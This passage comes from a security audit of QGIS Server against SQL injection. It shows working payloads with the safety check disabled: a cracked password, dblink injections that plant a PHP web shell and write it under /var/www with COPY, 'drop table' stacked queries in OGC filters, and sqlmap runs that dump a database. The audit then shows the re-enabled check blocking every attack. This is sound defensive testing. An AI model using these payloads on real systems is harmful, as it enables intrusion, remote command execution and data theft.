$ time wine MDCrack-sse.exe --algorithm=MD5 --append=foo bdbf4c08fb950992d27f229a08cba675

System / Starting MDCrack v1.8(3)
System / Target hash: bdbf4c08fb950992d27f229a08cba675
----/ Thread #2 (Success) \----
System / Thread #2: Collision found: f03l8ofoo
Info   / Thread #2: Candidate/Hash pairs tested: 3 680 552 562 ( 3.68e+009 ) in 9min 22s 895ms

real    9m23.138s
user    27m50.820s
sys 0m6.440s

The password actually found is f03l8o. Then, always with pattern matching, we obtained names of other databases on the hosting server. And with other kind of advanced SQL injection, it’s even possible to retrieve IP and port of the database server (with inet_server_addr() and inet_server_port() functions). Then, thanks to these informations, an attacker may go much further, and it’s even more simple if the dblink extension is loaded. Indeed, from that moment, we have the opportunity to do whatever we want on other databases, like creating tables:

FILTER=
point:"name" = 'b' OR (
    SELECT * FROM dblink(
        'host=XXX.XXX.XXX.XXX user=foo password=f03l8o dbname=privdb',
        'CREATE TABLE utils(cmd TEXT)'
    )
    RETURNS (result TEXT)
) = ''

As well as inserting values:

FILTER=
point:"name" = 'b' OR (
    SELECT * FROM dblink(
        'host=XXX.XXX.XXX.XXX user=foo password=f03l8o dbname=privdb',
        'INSERT INTO utils VALUES( ''<?php echo exec($_GET["cmd"]); ?>'' )'
    )
    RETURNS (result TEXT)
) = ''

Another kind of attack that we haven’t even brought up is using the COPY statement. If you don’t see with these words when I’m driving you, then let’s take a look to the next filter:

FILTER=
point:"name" = 'b' OR (
    SELECT * FROM dblink(
        'host=XXX.XXX.XXX.XXX user=foo password=f03l8o dbname=privdb',
        'COPY ( SELECT * FROM utils ) to ''/var/www/html/cache/backdoor.php'''
    )
    RETURNS (result TEXT)
) = ''

The COPY statement allows you to save the content of a table into a file. Obviously, it can be tedious to find a directory with the good permissions, but it’s common to have some cache directory with writing rights in the /var/www directory. And just thanks to the previous command, we have created an Operating System backdoor which allows us to run shell commands directly on the OS hosting QGIS Server:

$ curl "http://myserver.com/cache/backdoor.php?cmd=uname -a"
Linux oslandia 4.8.0-1-amd64 #1 SMP Debian 4.8.5-1 (2016-10-28) x86_64 GNU/Linux

Sanity check Re-activated

Once the sanity check reactivated, none of the previous attacks worked! Good news!

Actually, it’s mainly due to the whitelist of allowed characters and tokens which is very limited. As soon as the filter string contains unauthorized keywords (such as UNION, SELECT, -, …), the request is purely rejected!

Moreover, some tokens considered as dangerous are duplicated. For instance, all inner simple quote are duplicated to be interpreted as quote within the string (and not as the end of the string). It’s the same thing for backslashes to avoid some particular meaning for the next character.

And let us also not forget that the filter string is splitted according to the semicolon character, which considerably reduces attacks opportunities.

An other kind of attack which has not been discussed until there is the error-based attack. In this case, the aim is to extract errors generated by the database when an invalid query is passed. However, in case of an invalid query, the error message coming from the database never reaches the server part. Actually, the only variable used to generate the exception report is the filter string:

<ServiceExceptionReport version="1.3.0" xmlns="http://www.opengis.net/ogc">
<ServiceException code="Filter string rejected">The filter string name = 'b' select has been rejected because of security reasons. Note: Text strings have to be enclosed in single or double quotes. A space between each word / special character is mandatory. Allowed Keywords and special characters are  AND,OR,IN,&lt;,>=,>,>=,!=,',',(,),DMETAPHONE,SOUNDEX. Not allowed are semicolons in the filter expression.</ServiceException>
</ServiceExceptionReport>

Filter Encoding

Filter Encoding is supported by QGIS Server in several ways and through various requests and parameters. However, it’s another entry point for attackers! And by the way, a series of patchs have been applied to MapServer several years ago because of some vulnerabilities detected in the GetFeature request. In this case, stacked queries could be introduced within the OGC filter. So, we took a look on how these XML filters are managed in QGIS Server.

As a first step, we looked at the GetFeature WFS request, which is able to digest an OGC XML filter thanks to the FILTER parameter:

http://myserver.com/qgisserver?
SERVICE=WFS&
REQUEST=GetFeature&
MAP=/home/user/project.qgs&
CRS=EPSG:32613&
TYPENAME=point&
FILTER=
<ogc:Filter xmlns:ogc="http://www.opengis.net/ogc">
    <ogc:PropertyIsEqualTo>
        <ogc:PropertyName>pkuid</ogc:PropertyName>
        <ogc:Literal>4</ogc:Literal>
    </ogc:PropertyIsEqualTo>
</ogc:Filter>

Actually, the filtering step is done with the XML tags <ogc:PropertyName> and <ogc:Literal>. According to the previous example, the underlying SQL query would be something like this:

SELECT * FROM point WHERE (pkuid = '4')

Obviously, an attacker could hope that a stacked query may be injected with a filter of this form:

FILTER=
<ogc:Filter xmlns:ogc="http://www.opengis.net/ogc">
    <ogc:PropertyIsEqualTo>
        <ogc:PropertyName>pkuid</ogc:PropertyName>
        <ogc:Literal>'); drop table point --</ogc:Literal>
    </ogc:PropertyIsEqualTo>
</ogc:Filter>

It’s typically through this kind a thing that a mean query could be introduced and be executed by the underlying database in MapServer before the patchs and fixes. The same thing was also possible through the <ogc:PropertyName> tag. But, the great news is that this kind of attack is not possible with QGIS Server due to the implementation strategy. In fact, the filtering step is done with QgsExpression on server side, so the SQL injection never reaches the database. However, it’s probably not the best way for efficiency…

While we’re talking about GetFeature, it’s worth mentioning that the EXP_FILTER allows to do some filtering by directly writing expressions. But the implementation logic is exactly the same than with FILTER, so there’s no possibility of attacking by this way neither.

An other entry point for SQL injection with Filter Encoding is the SLD parameter of the WMS GetMap request. In fact, Styled Layer Descriptor is a standard which allows users to define styling rules to extend the WMS standard. Then, it’s possible to write styling rules for specific features. Below is a very basic example:

<UserStyle>
    <se:Name>point</se:Name>
    <se:FeatureTypeStyle>
        <se:Rule>
            <se:Name>Single symbol</se:Name>
            <ogc:Filter xmlns:ogc="http://www.opengis.net/ogc">
                <ogc:PropertyIsGreaterThan>
                    <ogc:PropertyName>pkuid</ogc:PropertyName>
                    <ogc:Literal>1</ogc:Literal>
                </ogc:PropertyIsGreaterThan>
            </ogc:Filter>
            <se:PointSymbolizer>
                <se:Graphic>
                    <se:Mark>
                        <se:WellKnownName>circle</se:WellKnownName>
                    </se:Mark>
                    <se:Size>7</se:Size>
                </se:Graphic>
            </se:PointSymbolizer>
        </se:Rule>
        <se:Rule>
            <se:Name>Single symbol</se:Name>
            <ogc:Filter xmlns:ogc="http://www.opengis.net/ogc">
                <ogc:PropertyIsEqualTo>
                    <ogc:PropertyName>pkuid</ogc:PropertyName>
                    <ogc:Literal>1</ogc:Literal>
                </ogc:PropertyIsEqualTo>
            </ogc:Filter>
            <se:PointSymbolizer>
                <se:Graphic>
                    <se:Mark>
                        <se:WellKnownName>square</se:WellKnownName>
                    </se:Mark>
                    <se:Size>20</se:Size>
                </se:Graphic>
            </se:PointSymbolizer>
        </se:Rule>
    </se:FeatureTypeStyle>
</UserStyle>

Then, the resulting image is something like this:

However, as previously described for the GetFeature request, the <ogc:Literal> XML tag may be vulnerable to SQL injections if precautions are not taken. And this time, the filtering step is done on the database side. So, according to the above example, the following query is executed:

SELECT * FROM point WHERE (("pkuid" > '1') OR ("pkuid" = '1'))

But, even if we are trying to inject a stacked query, characters considered as malicious are duplicated. For example with the XML tag <ogc:Literal>1′)); drop table point –</ogc:Literal>, the underlying query is actually executed and an error is raised:

SELECT * FROM point WHERE (("pkuid" > '1'')); drop table point --'))
ERROR:  invalid input syntax for integer: "1')); drop table point --"

The single quote is duplicated to be considered as a real quote within the string and the stacked query is never executed. The same thing happens with an UNION-based attack:

SELECT * FROM point WHERE (("pkuid" > '1'')) UNION SELECT * FROM aoi --')
ERROR:  invalid input syntax for integer: "1')) union select * from aoi"

As regards the backslashes character with <ogc:Literal>\<ogc:Literal>:

SELECT * FROM point WHERE (("pkuid" > '1') OR ("pkuid" = E'\\'))

SQLMap: an automated injections SQL tool

So far, manual tests have allowed us to detect that without the safety check, the server is vulnerable to some classical injection SQL attacks. But we didn’t really exploit weak points until there.

Thus, we decided to run SQLMap, a penetration testing tool, with the safety check deactivated and for the whole bunch of attacks:

  • Boolean-based blind
  • Error-based
  • Union query-based
  • Stacked queries
  • Time-based blind
  • Inline queries

You know, just to see how far we can go! And it’s frankly impressive… Thanks to the exploitation of the weak points previously described, SQLMap is able to retrieve the content of the full database, whether it is PostgreSQL or SQLite!

$ python sqlmap.py -u "http://localhost/qgisserver?QUERY_LAYERS=point&LAYERS=point&SERVICE=WMS&WIDTH=500&HEIGHT=500&BBOX=606171,4822867,612834,4827375&CRS=EPSG:32613&MAP=/home/user/project.qgs&VERSION=1.1.1&REQUEST=GetFeatureInfo&FILTER=point:"name" = 'a')" -a -p FILTER --level=5 --dbms=postgresql --time-sec=1
......
......
$ ls ~/.sqlmap/output/localhost/dump/SQLite_masterdb/
aoi.csv                      idx_background_geometry_node.csv    sql_statements_log.csv
background.csv               idx_background_geometry_parent.csv  views_geometry_columns.csv
geometry_columns_auth.csv    idx_background_geometry_rowid.csv   views_layer_statistics.csv
geometry_columns.csv         layer_statistics.csv                virts_geometry_columns.csv
idx_aoi_geometry_node.csv    point.csv                           virts_layer_statistics.csv
idx_aoi_geometry_parent.csv  spatialite_history.csv
idx_aoi_geometry_rowid.csv   spatial_ref_sys.csv
$ cat ~/.sqlmap/output/localhost/dump/SQLite_masterdb/aoi.csv
pkuid,ftype
1,private_value

After this disturbing revelation, we retry to run SQLMap with the safety check function activated. And you know what!? He has not succeeded in infiltrating the server, whatever we tried!

$ python sqlmap.py -u "http://localhost/qgisserver?QUERY_LAYERS=point&LAYERS=point&SERVICE=WMS&WIDTH=500&HEIGHT=500&BBOX=606171,4822867,612834,4827375&CRS=EPSG:32613&MAP=/home/user/project.qgs&VERSION=1.1.1&REQUEST=GetFeatureInfo&FILTER=point:"name" = 'a')" -a -p FILTER --level=5 --dbms=postgresql --time-sec=1
[15:06:20] [INFO] testing connection to the target URL
[15:06:20] [WARNING] heuristic (basic) test shows that GET parameter 'FILTER' might not be injectable
[15:06:20] [INFO] testing for SQL injection on GET parameter 'FILTER'
[15:06:20] [WARNING] GET parameter 'FILTER' does not seem to be injectable
[15:06:20] [CRITICAL] all tested parameters appear to be not injectable.

Conclusion

The word of SQL injections is large and wide. As we noted throughout the previous study, many parameters have to be taken into account such as the kind of database actually used, extensions currently loaded, the importance of password robustness, …

Because of this, it’s always difficult (if not impossible) to say that a service is totally bulletproof against these kinds of attacks. However, thanks to this study and unit tests added in QGIS, we have the right to say that QGIS Server is very well protected against SQL injections because none of our attacks reach their goal!

Back to Top

Sustaining Members